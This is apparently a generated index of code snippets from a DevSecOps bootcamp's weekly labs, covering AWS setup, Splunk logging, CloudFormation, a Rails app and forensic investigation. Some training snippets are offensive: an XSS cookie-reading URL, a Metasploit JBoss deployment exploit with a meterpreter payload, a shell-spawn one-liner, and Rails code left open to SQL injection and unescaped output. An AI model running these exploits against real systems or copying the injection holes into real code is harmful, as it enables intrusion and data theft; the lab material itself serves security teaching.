.*) . *"
| rex field=cmd "s/+/ /g"
```
--------------------------------
### Selfie Command Usage
Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/labs/LAB-2.md
Displays the available options and usage instructions for the Selfie command-line tool. Use this to understand how to configure and run Selfie.
```bash
$ selfie
Usage: selfie [options]
-r, --region REGION AWS Region (default: us-west-2)
-a, --target-account ACCOUNT Target AWS account to snapshot, without dashes
-R, --target-role ROLE Incident response target account role name
-n INSTANCEID, Comma-separated list of instances to snapshot
--target-instance-list
-i, --ir ACCOUNT The incident response (IR) account to copy snapshots into
-A, --control-account ACCOUNT The control plane account number
-c, --control-role ROLE Incident response control account role name
-u, --username USERNAME Your IAM username, used to grab MFA serial number
-t, --ticket-id TICKETID The ticket ID, will be added to snapshot description
-f, --file-path FILEPATH The file path to load and resume from
-p, --profile-name NAME The AWS credentials profile name
-b, --bucket BUCKET The bucket in incident response account for saving security configuration
-h, --help Show this message
--version Show version
```
--------------------------------
### SSH into Vagrant Virtual Machine
Source: https://github.com/devsecops/bootcamp/blob/master/Week-1/labs/LAB-3.md
Connects to the Vagrant virtual machine via SSH. If AWS configuration is missing, running 'vagrant provision' may resolve the issue by executing additional setup commands.
```bash
vagrant ssh
```
```bash
vagrant provision
```
--------------------------------
### Download, Decompress, and Count Words
Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md
Demonstrates downloading a compressed word list, organizing it into a directory, decompressing, and counting the total words.
```bash
$ wget http://download.openwall.net/pub/wordlists/all.gz
$ mkdir words
$ mv all.gz words/
$ cd words
$ gunzip all.gz
$ ls -l
$ wc -l all
```
--------------------------------
### Automate AWS Role Assumption
Source: https://github.com/devsecops/bootcamp/blob/master/Week-3/ASSIGNMENTS.md
Use the 'assumer' gem to automate assuming an AWS role into a target account and opening the AWS Console UI. Ensure the 'assumer' gem is installed and necessary AWS credentials/variables are configured.
```bash
assumer -a 717986480831 -r human/dso/TGT-dso-DeploymentAdmin -A 100352119871 -R dso/ctrl/my-app/CTL-my-app-DeploymentAdmin -o dso -g -u $AWS_USERNAME
```
--------------------------------
### XSS Attack URL Example
Source: https://github.com/devsecops/bootcamp/blob/master/Week-6/labs/LAB-1.md
This URL demonstrates an XSS attack by embedding JavaScript within the 'url' parameter. It is designed to execute an alert box showing document cookies. Note that browser compatibility may vary.
```url
http://127.0.0.1/?url=%2Fdashboard%2Fhome#test=%3Cscript%3Ealert(document.cookie)%3C/script%3E
```
--------------------------------
### Configure UserData for Proxy Support
Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-2.md
Add export commands for http_proxy and https_proxy to the UserData script. Ensure these variables are loaded on login by appending them to .bash_profile and configuring git.
```bash
#!/bin/bash -xe
export http_proxy=http://proxy:3128
export https_proxy=http://proxy:3128
rpm -ivh https://dl.fedoraproject.org/pub/epel/7/x86_64/e/epel-release-7-7.noarch.rpm
yum -y install git git-core zlib zlib-devel gcc-c++ patch readline readline-devel libyaml-devel libffi-devel openssl-devel make bzip2 autoconf automake libtool bison curl sqlite-devel
yum -y install nodejs mariadb mariadb-server mariadb-devel
systemctl enable mariadb.service
systemctl start mariadb.service
rpm -ivh https://s3-us-west-2.amazonaws.com/dso-public-bucket/ruby-2.3.1-1.el7.x86_64.rpm
cd /home/ec2-user
echo "export GEM_HOME=~/.gem" >> .bash_profile
echo "export GEM_PATH=~/.gem" >> .bash_profile
echo "export RAILS_ENV=mysql" >> .bash_profile
echo "export PATH=~/.gem/bin:$PATH" >> .bash_profile
echo "export http_proxy=http://proxy:3128" >> .bash_profile
echo "export https_proxy=http://proxy:3128" >> .bash_profile
echo "export no_proxy=localhost,127.0.0.1,169.254.169.254" >> .bash_profile
echo "[http]
proxy = $http_proxy" >> .gitconfig
chown ec2-user: .gitconfig
su -l -c "git clone https://github.com/OWASP/railsgoat.git" ec2-user
su -l -c "gem install bundler" ec2-user
su -l -c "cd railsgoat && bundle install && bundle exec rake db:setup" ec2-user
su -l -c "cd railsgoat && bundle exec rails server -b 0.0.0.0 -p 8080 &" ec2-user
```
--------------------------------
### Attempt to Create File as Non-Privileged User
Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md
Tries to create a file in the /etc directory as a regular user to demonstrate permission restrictions.
```bash
$ touch /etc/myfile.txt
```
--------------------------------
### Create New Rails Application
Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-2.md
Creates a new Rails application named 'myapp' with specific configurations, including MySQL database support and skipping certain Rails features.
```bash
$ rails new --skip-turbolinks --skip-spring \
--skip-test-unit -d mysql \
myapp
```
--------------------------------
### Create AWS IAM Access Keys
Source: https://github.com/devsecops/bootcamp/blob/master/Week-6/labs/LAB-3.md
Create API access keys for the newly created IAM user.
```bash
$ aws iam create-access-key --user-name hacker1
```
--------------------------------
### Upload Configuration to S3
Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/LESSON-1.md
Upload collected configuration files to an S3 bucket for secure storage and analysis.
```bash
aws s3 cp instance-config.json s3://your-forensic-bucket/instance-config.json
aws s3 cp iam-users.json s3://your-forensic-bucket/iam-users.json
aws s3 cp iam-roles.json s3://your-forensic-bucket/iam-roles.json
aws s3 cp iam-policies.json s3://your-forensic-bucket/iam-policies.json
```
--------------------------------
### Check Current User and List Files
Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md
Commands to determine the current logged-in user and list files in the home directory with all details.
```bash
$ whoami
$ ls -la
```
--------------------------------
### Display Raw Description in View
Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-2.md
Modifies the show view for bootcamps to render the description field using the `raw` helper, which bypasses HTML escaping.
```erb
Description:
<%=raw @bootcamp.description %>
```
--------------------------------
### Verify AWS CLI Configuration
Source: https://github.com/devsecops/bootcamp/blob/master/Week-1/ASSIGNMENTS.md
Run this command to verify that your AWS CLI is configured correctly and can connect to the AWS API. It should return an empty table if successful.
```bash
aws ec2 describe-instances --output table --region us-west-2
```
--------------------------------
### Configure Splunk Inputs
Source: https://github.com/devsecops/bootcamp/blob/master/Week-3/labs/LAB-2.md
Configure Splunk Universal Forwarder to monitor log directories for new data. It includes settings for the default host and monitoring specific log paths.
```bash
echo "[default]
host = \$decideOnStartup
[monitor:///home/ec2-user/railsgoat/log/]
recursive=true
[monitor:///var/log/]
recursive=true" | sudo tee /opt/splunkforwarder/etc/system/local/inputs.conf
```
--------------------------------
### Inspect File Permissions
Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md
Shows detailed information about the 'ls' command file, including its permissions, owner, and size.
```bash
$ ls -l /bin/ls
-rwxr-xr-x. 1 root root 117616 Feb 16 10:49 /bin/ls
```
--------------------------------
### Log in to AWS with Assumer
Source: https://github.com/devsecops/bootcamp/blob/master/Week-4/labs/LAB-1.md
Use the 'assumer' tool to log into the target AWS account. Ensure the AWS_USERNAME environment variable is set to your student ID.
```bash
$ unset AWS_SESSION_TOKEN AWS_SECRET_ACCESS_KEY AWS_ACCESS_KEY_ID
$ assumer -a 717986480831 -r human/dso/TGT-dso-DeploymentAdmin \
-A 100352119871 -R dso/ctrl/my-app/CTL-my-app-DeploymentAdmin \
-o dso -g -u $AWS_USERNAME
```
--------------------------------
### Configure AWS CLI
Source: https://github.com/devsecops/bootcamp/blob/master/Week-1/labs/LAB-3.md
This command initiates the AWS CLI configuration process. It prompts for access key ID, secret access key, default region, and output format.
```bash
aws configure
```
--------------------------------
### List Partitions on Attached Disk
Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/labs/LAB-3.md
Use fdisk to list partitions on a newly attached disk. Replace with the appropriate device ID for the disk (e.g., /dev/xvdf).
```bash
sudo fdisk -l
```
--------------------------------
### Display System Usernames
Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md
Shows the contents of the /etc/passwd file, which contains user account information.
```bash
$ cat /etc/passwd
```
--------------------------------
### Configure Splunk Outputs
Source: https://github.com/devsecops/bootcamp/blob/master/Week-3/labs/LAB-2.md
Configure Splunk Universal Forwarder to send data to a specified server and port. This includes the SSL certificate settings; as written, `sslVerifyServerCert = false` leaves server certificate verification turned off.
```bash
echo "[tcpout]
defaultGroup = dso-autolb-group
[tcpout:dso-autolb-group]
disabled = false
dropEventsOnQueueFull = 10
server = appliance:9997
sslCertPath = \$SPLUNK_HOME/etc/auth/server.pem
sslPassword = password
sslRootCAPath = \$SPLUNK_HOME/etc/auth/cacert.pem
sslVerifyServerCert = false
useACK = false" | sudo tee /opt/splunkforwarder/etc/system/local/outputs.conf
```
--------------------------------
### SSH into Bastion Instance
Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-2.md
Connects to the bastion instance using SSH with agent forwarding enabled (`-A`), which makes the keys loaded in your local SSH agent usable from the bastion without copying them there. Verify the key is loaded with `ssh-add -l`.
```bash
ssh -A student1@52.x.x.x
```
--------------------------------
### Implement Search in Index Action
Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-2.md
Adds search functionality to the `index` action of the `bootcamps` controller. It filters bootcamps by name if a search parameter is provided.
```ruby
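def index
  @bootcamps = Bootcamp.all
  if params[:search].to_s != ''
    # The search term is interpolated straight into the SQL string, so this
    # query is open to SQL injection; a bound parameter (a "name LIKE ?"
    # placeholder) would pass the term as data instead.
    @bootcamps = Bootcamp.where("name LIKE '%#{params[:search]}%'")
  else
    @bootcamps = Bootcamp.all
  end
end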
```
--------------------------------
### Trace Execution of a Custom Binary
Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/labs/LAB-3.md
Uses `strace` to trace the system calls made by a custom binary, revealing its behavior such as opening network ports.
```bash
strace /mnt//jenkins/tmp/si8xE3
```
--------------------------------
### SSH into Application Instance
Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-2.md
Connects to the application instance from the bastion using SSH. Assumes default user `ec2-user`.
```bash
ssh ec2-user@10.0.0.x
```
--------------------------------
### Connect to EC2 Instance
Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-3.md
Connect to your AWS EC2 instance using SSH with a specified private key.
```bash
ssh -i ~/Downloads/jg.pem ec2-user@54.x.x.x
```
--------------------------------
### CloudFormation Launch Configuration Resource
Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-2.md
Defines a Launch Configuration for an Auto Scaling Group. This specifies the instance details, including security groups, AMI, instance type, and key pair.
```json
"WebServerInstance": {
  "Type": "AWS::AutoScaling::LaunchConfiguration",
  "Properties": {
    "SecurityGroups": [
      {
        "Ref": "AppSecurityGroup"
      }
    ],
    "ImageId": {
      "Ref": "AmiId"
    },
    "InstanceType": {
      "Ref": "InstanceType"
    },
    "KeyName": {
      "Ref": "KeyName"
    },
    "UserData": {
      ...
    }
  }
}
```
--------------------------------
### Basic CloudFormation Template Structure
Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-1.md
This snippet shows the minimum required sections for a CloudFormation template: AWSTemplateFormatVersion, Description, Parameters, Resources, and Outputs.
```json
{
  "AWSTemplateFormatVersion": "2010-09-09",
  "Description": "...",
  "Parameters": {
  },
  "Resources": {
  },
  "Outputs": {
  }
}
```
--------------------------------
### List Jenkins User Home Directory Contents
Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/labs/LAB-3.md
Lists all files and directories within the Jenkins user's home directory.
```bash
ls -a /mnt//jenkins/var/lib/jenkins
```
--------------------------------
### AWS CLI Configuration Prompt
Source: https://github.com/devsecops/bootcamp/blob/master/Week-1/labs/LAB-3.md
This is the expected interactive prompt when configuring the AWS CLI. Fill in your AWS credentials and desired region/format.
```text
AWS Access Key ID [None]:
AWS Secret Access Key [None]:
Default region name [None]:
Default output format [None]:
```
--------------------------------
### Create and Count Words in a Text File
Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md
Creates a new text file using 'cat' and then counts the words within it. Press Ctrl+D to finish input.
```bash
$ cat > file.txt
this is my file, there are many like it but this one is mine...
^D
```
--------------------------------
### Set Root Route
Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-2.md
Sets the root route of the application to the index action of the bootcamps controller.
```ruby
root 'bootcamps#index'
```
--------------------------------
### Display Network Information
Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md
Shows network interface configuration (ifconfig), routing table (route), and network connections (netstat).
```bash
$ ifconfig
$ route
$ netstat -na
```
--------------------------------
### Clone Selfie Repository
Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/labs/LAB-2.md
Clone the Selfie tool's Git repository to your local machine to begin the automation process.
```bash
$ git clone https://github.com/devsecops/selfie.git
```
--------------------------------
### Gather IAM Configuration
Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/LESSON-1.md
Collect IAM configuration details using AWS CLI. This helps in understanding user permissions and policies.
```bash
aws iam list-users --region us-east-1 > iam-users.json
aws iam list-roles --region us-east-1 > iam-roles.json
aws iam list-policies --region us-east-1 > iam-policies.json
```
--------------------------------
### View Jenkins Auth Log
Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/labs/LAB-3.md
Displays the Jenkins authentication log to review system user activity.
```bash
sudo cat /mnt//jenkins/var/log/auth.log
```
--------------------------------
### Add Search Form to Index View
Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-2.md
Adds a search form to the `index` view for bootcamps, allowing users to input search terms.
```erb
Search
<%= form_tag(bootcamps_path, method: "get", id: "search-form") do %>
<%= text_field_tag :search, params[:search], placeholder: "Search Bootcamps" %>
<%= submit_tag "Search Bootcamps"%>
<% end %>
Listing Bootcamps
```
--------------------------------
### Upload Configuration Files to S3
Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/labs/LAB-1.md
Iterate through all JSON files in the current directory and upload them to the specified S3 bucket using the AWS CLI. This command is used to store collected forensic data.
```bash
# Glob directly instead of parsing `ls`, and quote the name so paths with spaces survive
for FILE in *.json; do
  aws s3 cp "$FILE" s3://dso-bootcamp-forensics/student1/
done
```
--------------------------------
### Spawn Bash Shell
Source: https://github.com/devsecops/bootcamp/blob/master/Week-6/labs/LAB-3.md
Use this Python command to spawn an interactive bash shell after gaining initial access.
```bash
> shell
python -c 'import pty; pty.spawn("/bin/bash")'
[ec2-user@ip-10-0-2-43 jboss-5.1.0.GA]$ cd ~
```
--------------------------------
### List Stacks with Restacker
Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-3.md
Command to list all current stacks managed by Restacker for a specific application and user context.
```bash
$ restacker list -l myapp -u student1 -c dso
```
--------------------------------
### Exploit JBoss DeploymentFileRepository WAR Deployment
Source: https://github.com/devsecops/bootcamp/blob/master/Week-6/labs/LAB-2.md
Configure and run the JBoss DeploymentFileRepository WAR Deployment exploit. Set the target host, exploit target, payload, and listener port (LPORT) based on your student ID.
```bash
> use exploit/multi/http/jboss_invoke_deploy
> set RHOST 10.0.6.165
> set target 1
> set payload java/meterpreter/bind_tcp
> set LPORT 10001
> exploit
```
--------------------------------
### Configure AWS CLI Profile
Source: https://github.com/devsecops/bootcamp/blob/master/Week-3/labs/LAB-1.md
Configure AWS CLI with access keys and a default region for a specific profile. This is typically done after downloading credentials.
```bash
aws configure --profile dso
AWS Access Key ID [None]:
AWS Secret Access Key [None]:
Default region name [None]: us-west-2
Default output format [None]: json
```
--------------------------------
### Create AWS IAM User
Source: https://github.com/devsecops/bootcamp/blob/master/Week-6/labs/LAB-3.md
Create a new IAM user and group in AWS, matching your student ID.
```bash
$ aws iam create-user --user-name hacker1
$ aws iam create-group --group-name hacker1
$ aws iam add-user-to-group --group-name hacker1 --user-name hacker1
```
--------------------------------
### Configure Splunk Outputs
Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-3.md
Configures the Splunk Universal Forwarder to send logs to a specified server group.
```bash
"echo \"[tcpout]\n",
"defaultGroup = dso-autolb-group\n",
"\n",
"[tcpout:dso-autolb-group]\n",
"disabled = false\n",
"dropEventsOnQueueFull = 10\n",
"server = appliance:9997\n",
"sslCertPath = \\\$SPLUNK_HOME/etc/auth/server.pem\n",
"sslPassword = password\n",
"sslRootCAPath = \\\$SPLUNK_HOME/etc/auth/cacert.pem\n",
"sslVerifyServerCert = false\n",
"useACK = false\" >> /opt/splunkforwarder/etc/system/local/outputs.conf\n"
```